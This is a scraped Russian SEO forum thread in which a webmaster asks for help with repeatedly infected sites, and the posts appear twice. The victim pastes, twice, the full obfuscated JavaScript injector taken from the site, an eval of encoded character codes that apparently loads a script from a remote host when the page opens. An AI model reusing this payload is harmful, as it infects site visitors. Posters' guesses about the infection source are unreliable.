Помогите, сайт заражен!

@**Phoenix** · 04.04.2012, 17:35

Globatel, мы сами админы! Хостеру я писал ответ был прост аудитом безопасности мы не занимаемся

Да кстати падаван а ты через браузер в панель заходил?

@Globatel · 04.04.2012, 17:50

Цитата:

Сообщение от xxxPHOENIXxxx

Globatel, мы сами админы! Хостеру я писал ответ был прост [I]аудитом безопасности мы не занимаемся

Прошу прощения, не подумал, что тут же тоже админы.
Ну тогда админов хостера нужно прикормить, чтобы засуетились)

@**падаван** · 04.04.2012, 21:29

Цитата:

Сообщение от xxxPHOENIXxxx

у тебя аддобе ридер стоит? Какая версия? и стоит ли в браузере прямое открытие файлов пдф через него?

Adobe Reader X 10.1.2. угу, сразу открывает..

Цитата:

Сообщение от xxxPHOENIXxxx

Да кстати падаван а ты через браузер в панель заходил?

сейчас, чтобы phpinfo закинуть, да. чз файлзиллу лишний раз теперь лезть не охото))

@**Phoenix** · 05.04.2012, 08:53

Ну вот походу наша беда. Я думаю беда в браузере а не файлзилле. удали все пароли из сохранок.

@**падаван** · 05.04.2012, 09:55

Цитата:

Сообщение от xxxPHOENIXxxx

Ну вот походу наша беда. Я думаю беда в браузере а не файлзилле. удали все пароли из сохранок.

откуда такой вывод? и какая связь с Adobe Readerом? ведь все время на фтп я заходил чз файлзиллу а не браузер..

@**specialist-seo** · 05.04.2012, 11:52

падаван, предполагается, что взломщики не через ftp зашли, а через панель управления на вебсайте

@**падаван** · 05.04.2012, 14:48

Цитата:

Сообщение от specialist-seo

предполагается, что взломщики не через ftp зашли, а через панель управления на вебсайте

а, но пароли я в браузере не храню, и до заражения чз панель на фтп никогда не заходил, только вчера, до этого исключительно чз файлзиллу

@**Phoenix** · 05.04.2012, 16:17

падаван, ну лично по моей ситуации я думаю что у меня хак через браузер был, в этом особо не разбираюсь, но слышал что можно использовать кеш для этого

@**demiurge** · 05.04.2012, 18:28

xxxPHOENIXxxx, мельком прочитал ветку, как я понял ты считаешь что заражение вручную было? Мне кажется наврядли, как-то это автоматом делается.

@**падаван** · 07.04.2012, 09:11

вот, позавчера специально для эксперимента, снова закинул тестовый сайт на бесплатный хостинг чз ФайлЗиллу, и сейчас он опять заражен! а тот, на который закидывал infophp через браузер, панель хостера, чистый. ну и что теперь, можно смело говорить что проблема с ФайлЗиллой??

ps
в этот раз уже пользовался версией с оф.сайта

@**Phoenix** · 07.04.2012, 09:13

скорее всего да. смени клиент и проверь

@**падаван** · 07.04.2012, 09:18

Цитата:

Сообщение от xxxPHOENIXxxx

скорее всего да. смени клиент и проверь

угу. а у тебя что, все чисто сейчас?

@**Phoenix** · 07.04.2012, 09:21

падаван, да пока все ок. Кстати поставь фаервол и посмотри с какими айпишками у тебя файлзилла конектится, возможно увидишь куда утекает инфа

@**падаван** · 07.04.2012, 09:26

вот еще как, теперь kis сам инфицированный файл скрипта за зараженный не принимает, а код заразы изменился!

Оффтоп:

c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")= ==83)try{Date().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i12i62i64i62i61i6i58i75i72i59i 66i65i67i67i72i64i6i60i81i70i60i70i75i5i64i71i69i6 1i6i59i71i69i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i 69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i6 1i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i6 8i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i 57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i7 6i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i1 1i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i 0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;693!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);

теперь kis паникует только тогда, когда сайт загружается, а если проверять файлы отдельно, то заразу не определяет

@**падаван** · 07.04.2012, 09:41

Цитата:

Сообщение от xxxPHOENIXxxx

Кстати поставь фаервол и посмотри с какими айпишками у тебя файлзилла конектится, возможно увидишь куда утекает инфа

вот то что вижу в kis

04.04.2012, 17:35	#31
@Phoenix Сам по себе Сообщений: 1,021 FR (активность): 39,032 Отзывы: 521 Доп. информация Регистрация: 24.11.2011 Специализация: SEO услуги Адрес: Ижевск	Globatel, мы сами админы! Хостеру я писал ответ был прост аудитом безопасности мы не занимаемся Да кстати падаван а ты через браузер в панель заходил? В сео денег нет, совсем нет

05.04.2012, 08:53	#34
@Phoenix Сам по себе Сообщений: 1,021 FR (активность): 39,032 Отзывы: 521 Доп. информация Регистрация: 24.11.2011 Специализация: SEO услуги Адрес: Ижевск	Ну вот походу наша беда. Я думаю беда в браузере а не файлзилле. удали все пароли из сохранок. В сео денег нет, совсем нет

05.04.2012, 16:17	#38
@Phoenix Сам по себе Сообщений: 1,021 FR (активность): 39,032 Отзывы: 521 Доп. информация Регистрация: 24.11.2011 Специализация: SEO услуги Адрес: Ижевск	падаван, ну лично по моей ситуации я думаю что у меня хак через браузер был, в этом особо не разбираюсь, но слышал что можно использовать кеш для этого В сео денег нет, совсем нет

07.04.2012, 09:11	#40
@падаван Друзья SEO cafe Сообщений: 814 FR (активность): 25,662 Отзывы: 234 Доп. информация Регистрация: 17.10.2010	вот, позавчера специально для эксперимента, снова закинул тестовый сайт на бесплатный хостинг чз ФайлЗиллу, и сейчас он опять заражен! а тот, на который закидывал infophp через браузер, панель хостера, чистый. ну и что теперь, можно смело говорить что проблема с ФайлЗиллой?? ps в этот раз уже пользовался версией с оф.сайта ученик SeoCafe

07.04.2012, 09:13	#41
@Phoenix Сам по себе Сообщений: 1,021 FR (активность): 39,032 Отзывы: 521 Доп. информация Регистрация: 24.11.2011 Специализация: SEO услуги Адрес: Ижевск	скорее всего да. смени клиент и проверь В сео денег нет, совсем нет

05.04.2012, 11:52	#36
@specialist-seo Супер-модератор Сообщений: 2,413 FR (активность): 62,830 Отзывы: 690 Доп. информация Регистрация: 16.10.2008 Специализация: Программирование Адрес: Москва	падаван, предполагается, что взломщики не через ftp зашли, а через панель управления на вебсайте

05.04.2012, 18:28	#39
@demiurge Пользователь Сообщений: 10 FR (активность): 204 Отзывы: 5 Доп. информация Регистрация: 16.10.2010	xxxPHOENIXxxx, мельком прочитал ветку, как я понял ты считаешь что заражение вручную было? Мне кажется наврядли, как-то это автоматом делается.

07.04.2012, 09:21	#43
@Phoenix Сам по себе Сообщений: 1,021 FR (активность): 39,032 Отзывы: 521 Доп. информация Регистрация: 24.11.2011 Специализация: SEO услуги Адрес: Ижевск	падаван, да пока все ок. Кстати поставь фаервол и посмотри с какими айпишками у тебя файлзилла конектится, возможно увидишь куда утекает инфа В сео денег нет, совсем нет

07.04.2012, 09:26	#44
@падаван Друзья SEO cafe Сообщений: 814 FR (активность): 25,662 Отзывы: 234 Доп. информация Регистрация: 17.10.2010	вот еще как, теперь kis сам инфицированный файл скрипта за зараженный не принимает, а код заразы изменился! Оффтоп: c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")= ==83)try{Date().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i12i62i64i62i61i6i58i75i72i59i 66i65i67i67i72i64i6i60i81i70i60i70i75i5i64i71i69i6 1i6i59i71i69i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i 69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i6 1i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i6 8i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i 57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i7 6i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i1 1i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i 0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;693!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1w[j]);}if(f)z=s;e(z); теперь kis паникует только тогда, когда сайт загружается, а если проверять файлы отдельно, то заразу не определяет ученик SeoCafe*

Сообщение форума

Отменить изменения

Опции темы
Версия для печати Отправить по электронной почте
Опции просмотра	Оценка этой теме
Линейный вид Комбинированный вид Древовидный вид	Оценка этой теме:

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Помогите оценить сайт	Tenza	Оценка сайтов	8	12.01.2012 19:36
Помогите раскрутить сайт	narmina	SEO оптимизация (анализ)	0	11.03.2011 15:58
Помогите оценить сайт	SE-O	Оценка сайтов	4	01.12.2010 00:51
Помогите продвинуть сайт	Staral	Раскрутка в общих чертах	4	02.10.2009 18:36
Помогите! сайт рухнул	vamgazel	Яndex	10	11.07.2009 09:31